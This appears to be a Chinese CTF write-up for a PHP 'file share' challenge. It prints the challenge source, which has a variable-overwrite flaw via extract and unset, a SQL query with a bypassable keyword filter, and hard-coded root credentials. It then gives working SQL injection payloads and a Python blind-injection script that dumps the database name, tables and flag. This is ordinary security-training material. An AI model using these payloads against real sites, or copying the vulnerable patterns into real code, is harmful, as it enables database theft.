根目录/www.zip
有源码
index.php
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<title>千毒网盘</title>
</head>
<body>
<div class="container">
<div class="page-header">
<h1>
千毒网盘 <small>提取你的文件</small>
</h1>
</div>
<div class="row clearfix">
<div class="col-md-4 column">
</div>
<div class="col-md-4 column">
<br>
<form role="form" action='/index.php' method="POST">
<div class="form-group">
<h3>提取码</h3><br><input class="form-control" name="code" />
</div>
<button type="submit" class="btn btn-block btn-default btn-warning">提取文件</button>
</form>
<br>
<?php
include 'code.php';
$pan = new Pan();
foreach(array('_GET', '_POST', '_COOKIE') as $key)
{
if($$key) {
foreach($$key as $key_2 => $value_2) {
if(isset($$key_2) and $$key_2 == $value_2)
unset($$key_2);
}
}
}
if(isset($_POST['code'])) $_POST['code'] = $pan->filter($_POST['code']);
if($_GET) extract($_GET, EXTR_SKIP);
if($_POST) extract($_POST, EXTR_SKIP);
if(isset($_POST['code']))
{
$message = $pan->getfile();
echo <<<EOF
<div class="alert alert-dismissable alert-info">
<button type="button" class="close" data-dismiss="alert" aria-hidden="true">×</button>
<h4>
注意!
</h4> <strong>注意!</strong> {$message}
</div>
EOF;
}
?>
</div>
<div class="col-md-4 column">
</div>
</div>
</div>
</div>
</body>
</html>
code.php
<?php
class Pan
{
public $hostname = '127.0.0.1';
public $username = 'root';
public $password = 'root';
public $database = 'ctf';
private $mysqli = null;
public function __construct()
{
$this->mysqli = mysqli_connect(
$this->hostname,
$this->username,
$this->password
);
mysqli_select_db($this->mysqli,$this->database);
}
public function filter($string)
{
$safe = preg_match('/union|select|flag|in|or|on|where|like|\'/is', $string);
if($safe === 0){
return $string;
}else{
return False;
}
}
public function getfile()
{
$code = $_POST['code'];
if($code === False) return '非法提取码!';
$file_code = array(114514,233333,666666);
if(in_array($code,$file_code))
{
$sql = "select * from file where code='$code'";
$result = mysqli_query($this->mysqli,$sql);
$result = mysqli_fetch_object($result);
return '下载直链为:'.$result->url;
}else{
return '提取码不存在!';
}
}
}
参考:https://daolgts.github.io/2018/09/05/unset-%E8%AE%B0%E4%B8%80%E9%81%93CTF%E9%A2%98/
构造payload
GET
http://eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com/index.php?_POST[code]=114514'/**/and/**/1=1#
POST
code=114514'/**/and/**/1=1#
and 1=1
and 1=2
联合查询可直接得到flag,需要注意的点是,这里无法通过构造前面为假后面为真的情况直接返回回显(因为前面一旦错误,直接被if判断为提取码不存在!
),另外这里in_array()
函数没有加第三个参数为true
,存在弱类型缺陷,不过没啥影响
只能构造如上条件,union select
两边都为真,返回两条数据,想要返回下面那条数据直接加个limit 1,1
即可
payload
7777777' union select 1,2 limit 1,1#
然后就是正常的注入过程了,这里就不一一演示了,直接查flag
然后比赛的时候我傻乎乎的用盲注做的。。。。。。贴一下盲注的解法
盲注脚本
import requests,string
from urllib.parse import quote
ascii_str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\]^_`{|}~"
url = 'http://eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com/index.php?_POST[code]='
post_header = {'Host': 'eci-2ze9e94upkcj2cauphmj.cloudeci1.ichunqiu.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Content-Type': 'application/x-www-form-urlencoded'}
for i in range(1,100):
for j in ascii_str:
payload = "114514'/**/and/**/ord(mid(database(),{0},1))={1}#".format(i,ord(j))
post_content = {'code':payload}
res_url = url+quote(payload)
res = requests.post(url=res_url,headers=post_header,data=post_content)
if 'png' in res.text:
print(j,end="")
payload
114514'/**/and/**/ord(mid(database(),{0},1))={1}#
114514'/**/and/**/ord(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),{0},1))={1}#
114514'/**/and/**/ord(mid((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),{0},1))={1}#
114514'/**/and/**/ord(mid((select/**/flag/**/from/**/ctf.flag),{0},1))={1}#
查询出来的结果
Databases: ctf
[ctf]Tables: file,flag
[flag]columns: flag